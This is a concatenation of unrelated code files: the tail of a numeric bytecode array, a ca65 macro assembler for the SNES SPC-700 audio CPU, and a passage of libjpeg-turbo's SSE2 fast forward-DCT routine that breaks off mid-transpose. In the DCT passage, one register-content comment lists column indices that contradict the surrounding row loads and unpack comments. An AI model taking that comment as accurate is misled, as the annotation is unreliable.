6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
170, 239, 160, 62, 42, 0,
16, 0, 2, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 230, 10, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 54, 59,
165, 62, 42, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 12, 242, 0, 16, 0,
5, 0, 0, 0, 70, 4,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 0, 139,
203, 64, 0, 43, 138, 190,
43, 221, 95, 64, 198, 162,
85, 192, 70, 4, 16, 0,
4, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
70, 0, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 146, 19, 166, 62,
42, 0, 16, 0, 2, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 230, 10,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
238, 185, 5, 63, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
163, 229, 146, 192, 45, 8,
122, 64, 167, 121, 7, 64,
60, 221, 139, 63, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 47, 155,
186, 62, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 103, 170, 90, 63,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
50, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 4, 55, 194, 64,
57, 69, 177, 63, 0, 0,
0, 0, 0, 0, 0, 0,
70, 0, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 130, 0, 16, 0,
2, 0, 0, 0, 70, 0,
16, 0, 3, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 1, 64, 0, 0,
71, 124, 174, 62, 42, 0,
16, 0, 2, 0, 0, 0,
56, 0, 0, 7, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 2, 0,
0, 0, 1, 64, 0, 0,
60, 254, 52, 61, 54, 0,
0, 5, 130, 0, 16, 0,
0, 0, 0, 0, 1, 64,
0, 0, 0, 0, 0, 0,
18, 0, 0, 1, 54, 0,
0, 5, 66, 0, 16, 0,
2, 0, 0, 0, 1, 64,
0, 0, 0, 0, 128, 63,
21, 0, 0, 1, 51, 0,
0, 7, 34, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 2, 0, 0, 0,
26, 0, 16, 0, 2, 0,
0, 0, 30, 0, 0, 7,
18, 0, 16, 0, 2, 0,
0, 0, 10, 0, 16, 0,
2, 0, 0, 0, 1, 64,
0, 0, 1, 0, 0, 0,
22, 0, 0, 1, 54, 0,
0, 5, 242, 32, 16, 0,
0, 0, 0, 0, 86, 5,
16, 0, 2, 0, 0, 0,
62, 0, 0, 1, 83, 84,
65, 84, 148, 0, 0, 0,
159, 0, 0, 0, 6, 0,
0, 0, 0, 0, 0, 0,
2, 0, 0, 0, 91, 0,
0, 0, 2, 0, 0, 0,
7, 0, 0, 0, 2, 0,
0, 0, 2, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
1, 0, 0, 0, 41, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 9, 0,
0, 0, 0, 0, 0, 0,
1, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0
};
| {
"language": "Assembly"
} |
; SPC-700 Assembler for ca65
; by Shay Green <[email protected]>
;
; Implements the Sony SPC-700 (SNES audio CPU) instruction set as ca65 macros,
; so SPC code can be assembled with the CPU instruction set disabled below.
.ifndef ::__MBSFX_SMP_Assembler__
::__MBSFX_SMP_Assembler__ = 1
;-------------------------------------------------------------------------------
; Disable all native opcodes; every mnemonic below is a macro that emits bytes.
.setcpu "none"
; DEFAULT_ABS: when non-zero, an operand with neither '!' (absolute) nor '<'
; (direct page) prefix defaults to absolute addressing instead of direct page.
.ifndef DEFAULT_ABS
DEFAULT_ABS = 0
.endif
; WARN_DEFAULT_ABS: when non-zero, each silent default to absolute addressing
; raises an assembler warning (only meaningful together with DEFAULT_ABS).
.ifndef WARN_DEFAULT_ABS
WARN_DEFAULT_ABS = 0
.endif
; _op_warn_default_abs expands to a warning .assert, or to nothing.
.if WARN_DEFAULT_ABS
.define _op_warn_default_abs .assert 0, warning, "Defaulting to absolute addressing"
.else
.define _op_warn_default_abs
.endif
;**** OP a, src
;**** OP dest, a
; d, !a, (X), [d+X],
;
; _op_a op, val — emit an A-accumulator ALU instruction. `op` is the opcode
; base; the addressing mode of `val` selects the offset added to it:
;   d -> $04+op    !a -> $05+op    (X) -> $06+op    [d+X] -> $07+op
;   d+X -> $14+op  !a+X -> $15+op  !a+Y -> $16+op   [d]+Y -> $17+op
; The .left/.right/.mid/.tcount calls strip the '!', '[]' and '+x'/'+y'
; decorations from the token list to recover the bare address expression.
.macro _op_a op, val
; leading '!' => 16-bit absolute operand (optionally indexed)
.if .xmatch (.left (1, {val}), !)
.if .xmatch (.right (2, {val}), +x)
.byte $15+op ; !a+X
.word .mid (1, .tcount ({val})-3, {val})
.elseif .xmatch (.right (2, {val}), +y)
.byte $16+op ; !a+Y
.word .mid (1, .tcount ({val})-3, {val})
.else
.byte $05+op ; !a
.word .right (.tcount ({val})-1, {val})
.endif
; leading '[' => indirect through a direct-page pointer
.elseif .xmatch (.left (1, {val}), [)
.if .xmatch (.right (3, {val}), +x])
.byte $07+op, .mid (1, .tcount ({val})-4, {val}) ; [d+X]
.elseif .xmatch (.right (3, {val}), ]+y)
.byte $17+op, .mid (1, .tcount ({val})-4, {val}) ; [d]+Y
.else
.assert 0, error, "unrecognized [] addressing mode"
.endif
.elseif .xmatch ({val}, {(x)})
.byte $06+op ; (X)
; no prefix: optionally default to absolute (see DEFAULT_ABS above)
.elseif DEFAULT_ABS && (!.xmatch (.left (1, {val}), <))
_op_warn_default_abs
.if .xmatch (.right (2, {val}), +x)
.byte $15+op ; a+X
.word .left (.tcount ({val})-2, {val})
.elseif .xmatch (.right (2, {val}), +y)
.byte $16+op ; a+Y
.word .left (.tcount ({val})-2, {val})
.else
.byte $05+op ; a
.word val
.endif
; otherwise direct page (a '<' prefix, if present, is consumed as an operator)
.elseif .xmatch (.right (2, {val}), +x)
.byte $14+op, .left (.tcount ({val})-2, {val}) ; d+X
.else
.byte $04+op, val ; d
.endif
.endmacro
; _op_imm op, val — like _op_a but also accepts an immediate operand:
; a leading '#' selects opcode $08+op followed by the immediate byte.
.macro _op_imm op, val
.if .xmatch (.left (1, {val}), #)
.byte $08+op, .right (.tcount ({val})-1, {val}) ; #imm (strip the '#')
.else
_op_a op, {val}
.endif
.endmacro
; _arith_a op, dest, src — two-operand ALU forms (OR/AND/EOR/CMP/ADC/SBC):
;   A, src   -> _op_imm (all A addressing modes plus #imm)
;   d, #imm  -> $18+op, with the immediate byte emitted before the dp address
;   (X), (Y) -> $19+op
;   dd, ds   -> $09+op, source dp byte first (SPC-700 operand order)
.macro _arith_a op, dest, src
.if .xmatch (.left (1, {dest}), a)
_op_imm op, src ; a, src
.elseif .xmatch (.left (1, {src}), #)
.byte $18+op, .right (.tcount ({src})-1, {src}), dest ; d, #
.elseif .xmatch ({dest}, {(x)}) && .xmatch ({src}, {(y)})
.byte $19+op ; (x), (y)
.else
.byte $09+op, src, dest ; dd, ds
.endif
.endmacro
; ALU mnemonics. The opcode bases match the SPC-700 opcode map; the trailing
; '_' on some names avoids colliding with ca65 built-in identifiers.
.define or _arith_a $00, ; dest, src
.define and_ _arith_a $20, ; dest, src
.define eor_ _arith_a $40, ; dest, src
.define adc_ _arith_a $80, ; dest, src
.define sbc_ _arith_a $A0, ; dest, src
;**** MOV dest, src
; _mov_a op, op_xplus, val — MOV where the other operand is A.
; op = $e0 encodes "MOV A,src"; op = $c0 encodes "MOV dest,A".
; op_xplus is the dedicated (X)+ auto-increment opcode ($BF load / $AF store).
; Register operands use fixed offsets: X = op-$63, Y = op-$03.
; (MOV Y,A = $FD breaks that pattern and is intercepted in `mov` itself.)
.macro _mov_a op, op_xplus, val
.if .xmatch ({val}, {(x)+})
.byte op_xplus ; (X)+ with auto-increment
.elseif .xmatch ({val}, x)
.byte op-$63 ; x ($e0 -> $7D MOV A,X; $c0 -> $5D MOV X,A)
.elseif .xmatch ({val}, y)
.byte op-$03 ; y ($e0 -> $DD MOV A,Y)
.else
_op_imm op, {val} ; #imm or any memory mode
.endif
.endmacro
; _mov_y op, val — MOV between Y and memory. op = 0 gives the loads
; (d=$EB, !a=$EC, d+X=$FB); op = $20 is subtracted to give the stores
; (d=$CB, !a=$CC, d+X=$DB).
.macro _mov_y op, val
.if .xmatch (.left (1, {val}), !)
.byte $ec-op ; !a
.word .right (.tcount ({val})-1, {val})
.elseif .xmatch (.right (2, {val}), +x)
.byte $fb-op, .left (.tcount ({val})-2, {val}) ; d+X
.elseif DEFAULT_ABS && (!.xmatch (.left (1, {val}), <))
_op_warn_default_abs
.byte $ec-op ; unprefixed operand defaulted to absolute
.word val
.else
.byte $eb-op, val ; d
.endif
.endmacro
; _mov_x op, val — MOV between X and memory. op = 0 gives the loads
; (d=$F8, !a=$E9, d+Y=$F9); op = $20 is subtracted to give the stores
; (d=$D8, !a=$C9, d+Y=$D9). Note X moves index with +Y, not +X.
.macro _mov_x op, val
.if .xmatch (.left (1, {val}), !)
.byte $e9-op ; !a
.word .right (.tcount ({val})-1, {val})
.elseif .xmatch (.right (2, {val}), +y)
.byte $f9-op, .left (.tcount ({val})-2, {val}) ; d+Y
.elseif DEFAULT_ABS && (!.xmatch (.left (1, {val}), <))
_op_warn_default_abs
.byte $e9-op ; unprefixed operand defaulted to absolute
.word val
.else
.byte $f8-op, val ; d
.endif
.endmacro
; mov dest, src — full MOV mnemonic. Handles the register/immediate forms
; whose opcodes don't fit the _mov_* offset patterns first, then dispatches
; to _mov_a/_mov_x/_mov_y, and finally the memory-to-memory forms.
; NOTE: the branch order matters — "dest is Y" must be checked before the
; generic "src is A" path because MOV Y,A ($FD) breaks the offset pattern.
.macro mov dest, src
.if .xmatch ({dest}, y)
.if .xmatch (.left (1, {src}), #)
.byte $8d, .right (.tcount ({src})-1, {src}) ; MOV Y,#imm
.elseif .xmatch ({src}, a)
.byte $fd ; a (inconsistent encoding)
.else
_mov_y 0, {src}
.endif
.elseif .xmatch ({dest}, a)
_mov_a $e0, $BF, src ; MOV A, src
.elseif .xmatch ({src}, a)
_mov_a $c0, $AF, dest ; MOV dest, A
.elseif .xmatch ({dest}, x)
.if .xmatch (.left (1, {src}), #)
.byte $cd, .right (.tcount ({src})-1, {src}) ; MOV X,#imm
.elseif .xmatch ({src}, sp)
.byte $9d ; MOV X,SP
.else
_mov_x 0, src
.endif
.elseif .xmatch ({src}, x)
.if .xmatch ({dest}, sp)
.byte $BD ; MOV SP,X
.else
_mov_x $20, dest
.endif
.elseif .xmatch ({src}, y)
_mov_y $20, {dest}
.elseif .xmatch (.left (1, {src}), #)
.byte $8f, .right (.tcount ({src})-1, {src}), dest ; MOV d,#imm (imm byte first)
.else
.byte $fa, src, dest ; MOV dd,ds (source dp byte first)
.endif
.endmacro
;**** CMP src1, src2
; _cmp_xy op, immop, val — CMP of X (op=0) or Y (op=$40) against:
;   #imm -> dedicated opcode `immop` ($C8 for X, $AD for Y)
;   !a   -> $1E+op
;   d    -> $3E+op
.macro _cmp_xy op, immop, val
.if .xmatch (.left (1, {val}), #)
.byte immop, .right (.tcount ({val})-1, {val}) ; #
.elseif .xmatch (.left (1, {val}), !)
.byte $1e+op ; !a
.word .right (.tcount ({val})-1, {val})
.elseif DEFAULT_ABS && (!.xmatch (.left (1, {val}), <))
_op_warn_default_abs
.byte $1e+op ; a (unprefixed, defaulted to absolute)
.word val
.else
.byte $3e+op, val ; d
.endif
.endmacro
; cmp_ dest, src — CMP mnemonic ('_' avoids clashing with a built-in name).
; X/Y comparisons have their own opcode family (_cmp_xy); everything else is
; the standard ALU form via _arith_a with opcode base $60.
.macro cmp_ dest, src
.if .xmatch ({dest}, x)
_cmp_xy 0, $c8, {src}
.elseif .xmatch ({dest}, y)
_cmp_xy $40, $ad, {src}
.else
_arith_a $60, dest, src
.endif
.endmacro
;**** RMW dest
; _op_shift op, val — read-modify-write ops (ASL/ROL/LSR/ROR, and INC/DEC via
; _inc_dec). Addressing-mode offsets:
;   A -> $1C+op    !a -> $0C+op    d+X -> $1B+op    d -> $0B+op
.macro _op_shift op, val
.if .xmatch ({val}, a)
.byte $1c+op ; A
.elseif .xmatch (.left (1, {val}), !)
.byte $0c+op ; !a
.word .right (.tcount ({val})-1, {val})
.elseif .xmatch (.right (2, {val}), +x)
.byte $1b+op, .left (.tcount ({val})-2, {val}) ; d+X
.elseif DEFAULT_ABS && (!.xmatch (.left (1, {val}), <))
_op_warn_default_abs
.byte $0c+op ; unprefixed operand defaulted to absolute
.word val
.else
.byte $0b+op, val ; d
.endif
.endmacro
; _inc_dec op, val — DEC (op=$00) / INC (op=$20). X and Y have dedicated
; opcodes; the remaining modes reuse _op_shift with an extra $80 offset
; (e.g. DEC A=$9C, INC A=$BC, DEC d=$8B, INC d=$AB).
.macro _inc_dec op, val
.if .xmatch ({val}, x)
.byte $1d+op ; x ($1D DEC X / $3D INC X)
.elseif .xmatch ({val}, y)
.byte $dc+op ; y ($DC DEC Y / $FC INC Y)
.else
_op_shift $80+op, {val}
.endif
.endmacro
; RMW mnemonics; '_' suffix avoids clashing with built-in 65xx names.
.define dec_ _inc_dec $00, ; val
.define inc_ _inc_dec $20, ; val
.define lsr_ _op_shift $40, ; val
.define asl_ _op_shift $00, ; val
.define rol_ _op_shift $20, ; val
.define ror_ _op_shift $60, ; val
;**** PUSH/POP
; _push_pop base, reg — emit PUSH (base=$00) or POP (base=$81) for a single
; register operand. Register opcodes: PSW=$0D, A=$2D, X=$4D, Y=$6D, with the
; POP variant at each opcode plus $81.
.macro _push_pop base, reg
.if .xmatch ({reg}, psw)
.byte $0d+base ; PUSH/POP PSW
.elseif .xmatch ({reg}, a)
.byte $2d+base ; PUSH/POP A
.elseif .xmatch ({reg}, x)
.byte $4d+base ; PUSH/POP X
.elseif .xmatch ({reg}, y)
.byte $6d+base ; PUSH/POP Y
.else
.assert 0, error, "invalid register"
.endif
.endmacro
; PUSH emits the base opcodes; POP adds $81 to each.
.define push _push_pop $00,
.define pop _push_pop $81,
;**** SET1/CLR1
; _op_bit op, bitval, val — bit instructions taking a "d.bit" operand.
; Scans the token list for the '.' separator; the tokens before it are the
; dp address and the tokens after it the bit number. Emits
; op + bit*bitval (bitval=$20 packs the bit into the opcode's high bits)
; followed by the dp address byte.
.macro _op_bit op, bitval, val
.local @begin
@begin:
.repeat .tcount ({val}), i
.if .xmatch (.mid (i, 1, {val}), .)
.byte op + (bitval * .right (.tcount ({val})-(i+1), {val}))
.byte .left (i, {val})
.endif
.endrepeat
; TODO: report error during assembly rather than linking
; Exactly 2 bytes emitted <=> exactly one '.' matched in the operand.
.assert (*-@begin) = 2, error, "unsupported addressing mode"
.endmacro
.define set1 _op_bit $02, $20,
.define clr1 _op_bit $12, $20,
;**** Branch
.macro _branch_offset instr, target
.local @distance, @next
@distance = (target) - @next
instr
.assert @distance >= -128 && @distance <= 127, error, "branch out of range"
.byte <@distance
@next:
.endmacro
.macro _op_branch inst, target
_branch_offset {.byte inst}, target
.endmacro
.macro bbs val, target
_branch_offset {_op_bit $03, $20, val}, target
.endmacro
.macro bbc val, target
_branch_offset {_op_bit $13, $20, val}, target
.endmacro
.macro dbnz val, target
.if .xmatch ({val}, y)
_op_branch $fe, target
.else
_op_branch {$6e, val}, (target)
.endif
.endmacro
.macro cbne val, target
.if .xmatch (.right (2, {val}), +x)
_branch_offset {.byte $de, .left (.tcount ({val})-2, {val})}, target
.else
_branch_offset {.byte $2e, val}, target
.endif
.endmacro
.define bpl _op_branch $10, ; target
.define bra _op_branch $2f, ; target
.define bmi _op_branch $30, ; target
.define bvc _op_branch $50, ; target
.define bvs _op_branch $70, ; target
.define bcc _op_branch $90, ; target
.define bcs _op_branch $B0, ; target
.define bne _op_branch $D0, ; target
.define beq _op_branch $f0, ; target
;**** OP !abs
; _op_abs: absolute-only encoder (opcode + 16-bit address). Accepts an
; explicit '!abs' operand, or a bare operand when DEFAULT_ABS is set.
.macro _op_abs op, val; ****
.if .xmatch (.left (1, {val}), !)
.byte op
.word .right (.tcount ({val})-1, {val})
.elseif DEFAULT_ABS && (!.xmatch (.left (1, {val}), <))
_op_warn_default_abs
.byte op
.word val
.else
.assert 0, error, "unsupported addressing mode"
.endif
.endmacro
.define tset1 _op_abs $0E, ; abs
.define tclr1 _op_abs $4E, ; abs
.define call _op_abs $3F, ; abs
; jmp_: JMP. Handles the indexed-indirect form [!abs+x] (opcode $1f),
; including the bare [abs+x] spelling under DEFAULT_ABS; plain targets
; fall through to the absolute encoder ($5f).
.macro jmp_ val; ****
.if .xmatch (.left (2, {val}), [!) && .xmatch (.right (3, {val}), +x])
.byte $1f
.word .mid (2, .tcount ({val})-5, {val})
.elseif DEFAULT_ABS && .xmatch (.left (1, {val}), [) && .xmatch (.right (3, {val}), +x])
_op_warn_default_abs
.byte $1f
.word .mid (1, .tcount ({val})-4, {val})
.else
_op_abs $5f, val
.endif
.endmacro
;**** $1FFF.bit
; _op_mbit: encode "op abs.bit" where the 13-bit address and 3-bit bit
; number share one 16-bit operand word (bit number in the top 3 bits,
; i.e. multiplied by $2000).
.macro _op_mbit op, val
.local @begin, @addr
@begin:
.repeat .tcount ({val}), i
.if .xmatch (.mid (i, 1, {val}), .)
@addr = .left (i, {val})
.assert 0 <= @addr && @addr <= $1FFF, error, "address exceeds 13 bits"
.byte op
.word (.right (.tcount ({val})-(i+1), {val}))*$2000 + @addr
.endif
.endrepeat
; TODO: report error during assembly rather than linking
.assert (*-@begin) = 3, error, "unsupported addressing mode"
.endmacro
; _op_mbit_c: as _op_mbit, but the other operand must be the carry (C).
.macro _op_mbit_c op, carry, val
.if .xmatch (carry, c)
_op_mbit op, val
.else
.assert 0, error, "destination must be C"
.endif
.endmacro
; _op_mbit_inv: accepts an optional '/abs.bit' (inverted-bit) source;
; the inverted form uses op+$20.
.macro _op_mbit_inv op, carry, val
.if .xmatch (.left (1, {val}), /)
_op_mbit_c op+$20, carry, .right (.tcount ({val})-1, {val})
.else
_op_mbit_c op, carry, val
.endif
.endmacro
.define not1 _op_mbit $EA, ; abs.bit
.define or1 _op_mbit_inv $0A, ; abs.bit
.define and1 _op_mbit_inv $4A, ; abs.bit
.define eor1 _op_mbit_inv $8A, ; abs.bit
; mov1: MOV1 abs.bit, C ($CA) or MOV1 C, abs.bit ($AA).
.macro mov1 dest, src
.if .xmatch ({src}, c)
_op_mbit_c $CA, src, dest
.else
_op_mbit_c $AA, dest, src
.endif
.endmacro
;**** OP dp
; _op_dp: opcode followed by a single direct-page address byte.
.macro _op_dp op, dp
.byte op, (dp)
.endmacro
.define decw _op_dp $1a, ; dp
.define incw _op_dp $3a, ; dp
;**** OP reg
; _op_one_reg: emit op only if val matches the required register,
; otherwise raise the supplied error message.
.macro _op_one_reg op, reg, err, val
.if .xmatch ({val}, reg)
.byte op
.else
.assert 0, error, err
.endif
.endmacro
; _op_w: word (YA) operation followed by a direct-page operand byte.
.macro _op_w op, reg, val
_op_one_reg op, ya, "only supports ya", reg
.byte val
.endmacro
.define cmpw _op_w $5A, ; dp
.define addw _op_w $7A, ; dp
.define subw _op_w $9A, ; dp
; movw: MOVW dp, YA ($DA) or MOVW YA, dp ($BA).
.macro movw dest, src
.if .xmatch ({src}, ya)
_op_w $DA, src, dest
.else
_op_w $BA, dest, src
.endif
.endmacro
; div: DIV YA, X only ($9e).
.macro div dest, src
.if .xmatch ({dest}, ya) && .xmatch ({src}, x)
.byte $9e
.else
.assert 0, error, "only supports ya, x"
.endif
.endmacro
.define xcn _op_one_reg $9f, a, "only supports a",
.define das _op_one_reg $BE, a, "only supports a",
.define daa _op_one_reg $DF, a, "only supports a",
.define mul _op_one_reg $CF, ya, "only supports ya",
;**** Unique
; tcall: TCALL n (n = 0..15, folded into the opcode's high nibble).
.macro tcall val
.assert 0 <= (val) && (val) <= 15, error, "invalid value"
.byte (val)*$10 + $01
.endmacro
; pcall: PCALL u (one-byte page-call operand).
.macro pcall val
.byte $4f, (val)
.endmacro
;**** Implied
; _op_implied: single-byte instruction with no operands.
.macro _op_implied op
.byte op
.endmacro
.define nop _op_implied $00
.define brk _op_implied $0f
.define clrp _op_implied $20
.define setp _op_implied $40
.define clrc _op_implied $60
.define ret _op_implied $6f
.define reti _op_implied $7f
.define setc _op_implied $80
.define ei _op_implied $A0
.define di _op_implied $C0
.define clrv _op_implied $E0
.define notc _op_implied $ED
.define sleep _op_implied $ef
.define stop _op_implied $ff
; Map the plain mnemonics to the '_'-suffixed implementations unless
; CASPC_65XX is defined (presumably to avoid clashing with ca65's
; native 65xx opcodes -- confirm against the build that sets it).
.ifndef CASPC_65XX
.define and and_
.define eor eor_
.define adc adc_
.define sbc sbc_
.define cmp cmp_
.define dec dec_
.define inc inc_
.define lsr lsr_
.define asl asl_
.define rol rol_
.define ror ror_
.define jmp jmp_
.endif
.endif;__MBSFX_SMP_Assembler__
| {
"language": "Assembly"
} |
;
; jfdctfst.asm - fast integer FDCT (64-bit SSE2)
;
; Copyright 2009 Pierre Ossman <[email protected]> for Cendio AB
; Copyright (C) 2009, 2016, D. R. Commander.
;
; Based on the x86 SIMD extension for IJG JPEG library
; Copyright (C) 1999-2006, MIYASAKA Masaru.
; For conditions of distribution and use, see copyright notice in jsimdext.inc
;
; This file should be assembled with NASM (Netwide Assembler),
; can *not* be assembled with Microsoft's MASM or any compatible
; assembler (including Borland's Turbo Assembler).
; NASM is available from http://nasm.sourceforge.net/ or
; http://sourceforge.net/project/showfiles.php?group_id=6208
;
; This file contains a fast, not so accurate integer implementation of
; the forward DCT (Discrete Cosine Transform). The following code is
; based directly on the IJG's original jfdctfst.c; see the jfdctfst.c
; for more details.
;
; [TAB8]
%include "jsimdext.inc"
%include "jdct.inc"
; --------------------------------------------------------------------------
%define CONST_BITS 8 ; 14 is also OK.
; Fixed-point DCT constants: FIX(x) = round(x * 2^CONST_BITS).
%if CONST_BITS == 8
F_0_382 equ 98 ; FIX(0.382683433)
F_0_541 equ 139 ; FIX(0.541196100)
F_0_707 equ 181 ; FIX(0.707106781)
F_1_306 equ 334 ; FIX(1.306562965)
%else
; NASM cannot do compile-time arithmetic on floating-point constants.
; DESCALE rounds the 30-bit-precision value down to CONST_BITS bits.
%define DESCALE(x, n) (((x) + (1 << ((n) - 1))) >> (n))
F_0_382 equ DESCALE( 410903207, 30 - CONST_BITS) ; FIX(0.382683433)
F_0_541 equ DESCALE( 581104887, 30 - CONST_BITS) ; FIX(0.541196100)
F_0_707 equ DESCALE( 759250124, 30 - CONST_BITS) ; FIX(0.707106781)
F_1_306 equ DESCALE(1402911301, 30 - CONST_BITS) ; FIX(1.306562965)
%endif
; --------------------------------------------------------------------------
SECTION SEG_CONST
; PRE_MULTIPLY_SCALE_BITS <= 2 (to avoid overflow)
; CONST_BITS + CONST_SHIFT + PRE_MULTIPLY_SCALE_BITS == 16 (for pmulhw)
%define PRE_MULTIPLY_SCALE_BITS 2
%define CONST_SHIFT (16 - PRE_MULTIPLY_SCALE_BITS - CONST_BITS)
; Broadcast word constants, pre-shifted so that pmulhw (which keeps the
; high 16 bits of the 16x16 product) yields the scaled result directly.
alignz 32
GLOBAL_DATA(jconst_fdct_ifast_sse2)
EXTN(jconst_fdct_ifast_sse2):
PW_F0707 times 8 dw F_0_707 << CONST_SHIFT
PW_F0382 times 8 dw F_0_382 << CONST_SHIFT
PW_F0541 times 8 dw F_0_541 << CONST_SHIFT
PW_F1306 times 8 dw F_1_306 << CONST_SHIFT
alignz 32
; --------------------------------------------------------------------------
SECTION SEG_TEXT
BITS 64
;
; Perform the forward DCT on one block of samples.
;
; GLOBAL(void)
; jsimd_fdct_ifast_sse2(DCTELEM *data)
;
; r10 = DCTELEM *data
%define wk(i) rbp - (WK_NUM - (i)) * SIZEOF_XMMWORD ; xmmword wk[WK_NUM]
%define WK_NUM 2
; wk(0)/wk(1): two 16-byte scratch slots immediately below the aligned
; frame pointer; used to spill registers during the 8x8 transposes.
align 32
GLOBAL_FUNCTION(jsimd_fdct_ifast_sse2)
EXTN(jsimd_fdct_ifast_sse2):
; Prologue: save the caller's rsp, build a 16-byte-aligned frame in rbp,
; and reserve the wk[] scratch area below it.
push rbp
mov rax, rsp ; rax = original rbp
sub rsp, byte 4
and rsp, byte (-SIZEOF_XMMWORD) ; align to 128 bits
mov [rsp], rax
mov rbp, rsp ; rbp = aligned rbp
lea rsp, [wk(0)]
collect_args 1
; ---- Pass 1: process rows.
mov rdx, r10 ; (DCTELEM *)
movdqa xmm0, XMMWORD [XMMBLOCK(0,0,rdx,SIZEOF_DCTELEM)]
movdqa xmm1, XMMWORD [XMMBLOCK(1,0,rdx,SIZEOF_DCTELEM)]
movdqa xmm2, XMMWORD [XMMBLOCK(2,0,rdx,SIZEOF_DCTELEM)]
movdqa xmm3, XMMWORD [XMMBLOCK(3,0,rdx,SIZEOF_DCTELEM)]
; xmm0=(00 01 02 03 04 05 06 07), xmm2=(20 21 22 23 24 25 26 27)
; xmm1=(10 11 12 13 14 15 16 17), xmm3=(30 31 32 33 34 35 36 37)
movdqa xmm4, xmm0 ; transpose coefficients(phase 1)
punpcklwd xmm0, xmm1 ; xmm0=(00 10 01 11 02 12 03 13)
punpckhwd xmm4, xmm1 ; xmm4=(04 14 05 15 06 16 07 17)
movdqa xmm5, xmm2 ; transpose coefficients(phase 1)
punpcklwd xmm2, xmm3 ; xmm2=(20 30 21 31 22 32 23 33)
punpckhwd xmm5, xmm3 ; xmm5=(24 34 25 35 26 36 27 37)
movdqa xmm6, XMMWORD [XMMBLOCK(4,0,rdx,SIZEOF_DCTELEM)]
movdqa xmm7, XMMWORD [XMMBLOCK(5,0,rdx,SIZEOF_DCTELEM)]
movdqa xmm1, XMMWORD [XMMBLOCK(6,0,rdx,SIZEOF_DCTELEM)]
movdqa xmm3, XMMWORD [XMMBLOCK(7,0,rdx,SIZEOF_DCTELEM)]
; xmm6=( 4 12 20 28 36 44 52 60), xmm1=( 6 14 22 30 38 46 54 62)
; xmm7=( 5 13 21 29 37 45 53 61), xmm3=( 7 15 23 31 39 47 55 63)
movdqa XMMWORD [wk(0)], xmm2 ; wk(0)=(20 30 21 31 22 32 23 33)
movdqa XMMWORD [wk(1)], xmm5 ; wk(1)=(24 34 25 35 26 36 27 37)
movdqa xmm2, xmm6 ; transpose coefficients(phase 1)
punpcklwd xmm6, xmm7 ; xmm6=(40 50 41 51 42 52 43 53)
punpckhwd xmm2, xmm7 ; xmm2=(44 54 45 55 46 56 47 57)
